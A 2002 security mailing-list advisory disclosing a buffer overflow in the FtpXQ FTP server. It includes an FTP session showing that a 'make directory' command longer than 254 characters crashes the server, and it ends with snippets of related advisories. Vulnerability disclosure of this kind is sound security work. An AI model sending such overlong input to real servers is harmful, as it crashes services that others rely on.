[NT] FtpXQ MKD Buffer Overflow

From: support@securiteam.com
Date: 05/28/02

From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 28 May 2002 08:02:57 +0200 (CEST)

- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  FtpXQ MKD Buffer Overflow

SUMMARY

 <http://www.datawizard.net/Support/FtpXQ/ftpxq.htm> FtpXQ is an FTP
Server built using the WinsockQ from DataWizard Technologies. A security
vulnerability in the product allows remote attackers to overflow an
internal buffer by providing an overly long "make directory" request.

DETAILS

Vulnerable systems:
 * FtpXQ Server version 2.0.98 and above

Example:
% ftp localhost
Connected to xxxxxxxxx.rh.rit.edu.
220 DataWizard Technologies' FtpXQ FTP Server. (Version 2.0.98).
User (xxxxxxxxx.rh.rit.edu:(none)): test
331 OK need password.
Password:
230 Welcome to DataWizard Technologies' FtpXQ FTP Server.
ftp> MKD AAAAAAAAAAAAA.....AAAA

(longer than 254 chars crashes the server)

ADDITIONAL INFORMATION

The information has been provided by <mailto:snakebyte@gmx.de> SnakeByte
/ Eric Sesterhenn.

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [NEWS] SalesCart Database Storage Insecurity
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... struct sockaddr_in sin; ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] Remote Memory Reading Through TCP/ICMP
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A security vulnerability in Linux allows remote attackers to cause the ... remote OS to return chucks of "userland" memory. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] WebSight Directory System Vulnerable to Cross Site Scripting Bug
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WebSight Directory System version 0.1 ... When a user submits a new link (for approving by an administrator), ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] Sensitive Information Disclosure Vulnerability Found in SIPS (PHP)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A security vulnerability in the product allows attackers to get access to ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NT] Keene Digital Media Server Directory Traversal
    ... Get your security news from a reliable source. ... Keene Digital Media Server is "an easy and ... A directory traversal is possible on the DMS due to a problem in the way ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)